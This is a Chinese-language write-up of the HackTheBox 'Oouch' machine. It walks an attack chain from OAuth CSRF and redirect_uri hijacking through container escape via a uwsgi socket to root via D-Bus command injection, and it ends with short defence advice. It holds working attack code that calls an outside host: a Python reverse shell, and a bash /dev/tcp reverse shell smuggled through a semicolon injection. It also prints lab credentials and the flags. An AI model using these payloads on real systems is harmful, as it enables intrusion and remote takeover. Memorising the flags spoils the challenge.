OAuth 漏洞利用与特权升级攻击链分析

1. 信息收集与初始侦察

1.1 目标识别

• IP地址: 10.10.10.177
• 开放端口:
  • 21/tcp: FTP (vsftpd 3.0.3) - 允许匿名登录
  • 22/tcp: SSH (OpenSSH 7.9p1)
  • 5000/tcp: HTTP (nginx 1.14.2) - Oouch应用
  • 8000/tcp: RTSP/HTTP - 疑似OAuth授权服务

1.2 服务枚举

$ ip='10.10.10.177'; itf='tun0'
$ if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
        nmap -Pn -sV -sC -p "$ports" "$ip";
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
    fi;
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi

1.3 FTP匿名登录

发现project.txt文件:

$ ftp anonymous@10.10.10.177
ftp> get project.txt

2. OAuth 漏洞利用

2.1 主机名解析配置

$ echo '10.10.10.177 oouch.htb consumer.oouch.htb' >> /etc/hosts
$ echo '10.10.10.177 authorization.oouch.htb' >> /etc/hosts

2.2 OAuth 流程分析

1. Consumer端 (consumer.oouch.htb:5000)

   • /oauth/connect: 发起授权请求
   • /oauth/connect/token: 接收授权码

2. Authorization端 (authorization.oouch.htb:8000)

   • /oauth/authorize: 处理授权请求
   • /oauth/token: 颁发访问令牌

2.3 CSRF + OAuth 劫持攻击

攻击步骤:

1. 受害者访问恶意构造的链接:

   <a src='10.10.16.23/SUCCESS'>Click</a>
   

2. 利用Burp Suite拦截授权流程:

   POST /oauth/authorize/ HTTP/1.1
   Host: authorization.oouch.htb:8000
   [...]
   client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read&csrfmiddlewaretoken=xO8jp5M6ErzlvR9qSQjGlCNUr59VgULWtWgtIoZ7pCaegYJJ2QBJBD7Qt89uCj87&redirect_uri=http%3A%2F%2Fconsumer.oouch.htb%3A5000%2Foauth%2Fconnect%2Ftoken&scope=read&client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&state=&response_type=code&allow=Authorize
   

3. 修改redirect_uri参数为攻击者控制的服务器:

   redirect_uri=http://10.10.16.23/session
   

2.4 创建恶意OAuth应用

1. 使用开发者凭据登录:

   用户名: develop
   密码: supermegasecureklarabubu123!
   

2. 注册新应用:

   POST /oauth/applications/register/ HTTP/1.1
   Host: authorization.oouch.htb:8000
   Authorization: Basic ZGV2ZWxvcDpzdXBlcm1lZ2FzZWN1cmVrbGFyYWJ1YnUxMjMh
   [...]
   client_id=XrCJdV84GD8oHqk6n7B2jWJAhGAY8xRbYkpVOwbg
   client_secret=Gxcs7hJpp2LMrABEOekVSdkqMZJHPL1r29joPQVUOuULRvICwpJnnshfWzCIUSVFY7Rumx1nWFGgXEdH87ZRhgOvMTTyfcR5fAXnSnlDPIt8x0T6PQQAApN2yYjTX5tb
   redirect_uris=http://10.10.16.23/session
   

2.5 获取访问令牌

$ curl http://authorization.oouch.htb:8000/oauth/token/ \
  -d 'client_id=XrCJdV84GD8oHqk6n7B2jWJAhGAY8xRbYkpVOwbg&client_secret=Gxcs7hJpp2LMrABEOekVSdkqMZJHPL1r29joPQVUOuULRvICwpJnnshfWzCIUSVFY7Rumx1nWFGgXEdH87ZRhgOvMTTyfcR5fAXnSnlDPIt8x0T6PQQAApN2yYjTX5tb&redirect_uri=http://10.10.16.23/session&code=1GSzmFW6QE1KkSIDVmNrccKx8lRZUZ&grant_type=authorization_code'

2.6 使用令牌访问API

GET /api/get_user HTTP/1.1
Host: authorization.oouch.htb:8000
Authorization: Bearer Zc2sUB0hjJwjacnUiVgXYzKdO1CeGe

3. 获取初始访问权限

3.1 获取SSH私钥

GET /api/get_ssh HTTP/1.1
Host: authorization.oouch.htb:8000
Authorization: Bearer Zc2sUB0hjJwjacnUiVgXYzKdO1CeGe

3.2 用户flag

c4288c0c23f0b95affafdf00c6307b0d

4. 特权升级: TRP00F攻击

4.1 使用TRP00F工具

$ python trp00f.py --lhost 10.10.16.23 --lport 10022 \
                   --rhost 10.10.16.23 --rport 10090 \
                   --http 10091

4.2 获取www-data权限

5. 容器逃逸: uwsgi.socket劫持

5.1 内部网络扫描

$ ./nmap -sn 172.18.0.0/24 -oG - | awk '/Up$/{print $2}'
$ ./nmap -p- -T4 172.18.0.2 172.18.0.3 172.18.0.4 172.18.0.5

5.2 使用uwsgi_exp.py

$ sed '/import b/d' exp.py -i
$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.23",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > /tmp/rev.py
$ python exp.py -m unix -u /tmp/uwsgi.socket -c 'python /tmp/rev.py'

6. D-Bus RCE特权升级

6.1 分析漏洞代码

/code/oouch/routes.py中存在以下危险代码:

# 当检测到XSS攻击时
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
client_ip = request.remote_addr or request.environ.get('REMOTE_ADDR')
response = block_iface.Block(client_ip)

6.2 构造恶意请求

# dbus.py
import sys
sys.path.insert(0, "/usr/lib/python3/dist-packages")
import dbus

bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')

# 命令注入
client_ip = '1.1.1.1;bash -c "bash -i >& /dev/tcp/10.10.16.23/443 0>&1" #'
response = block_iface.Block(client_ip)
print(response)
bus.close()

6.3 获取root权限

执行上述脚本后获得root shell。

6.4 Root flag

6840699ac07f229d83a1863ddb97c3f4

7. 总结

本攻击链展示了从OAuth漏洞利用到最终特权升级的完整过程，关键点包括:

1. OAuth授权流程中的CSRF漏洞
2. redirect_uri参数的不安全验证
3. TRP00F工具进行中间人攻击
4. uwsgi.socket劫持实现容器逃逸
5. D-Bus接口的命令注入漏洞

防御建议:

• 严格验证redirect_uri
• 实现CSRF保护机制
• 限制D-Bus接口的输入验证
• 隔离容器网络
• 实施最小权限原则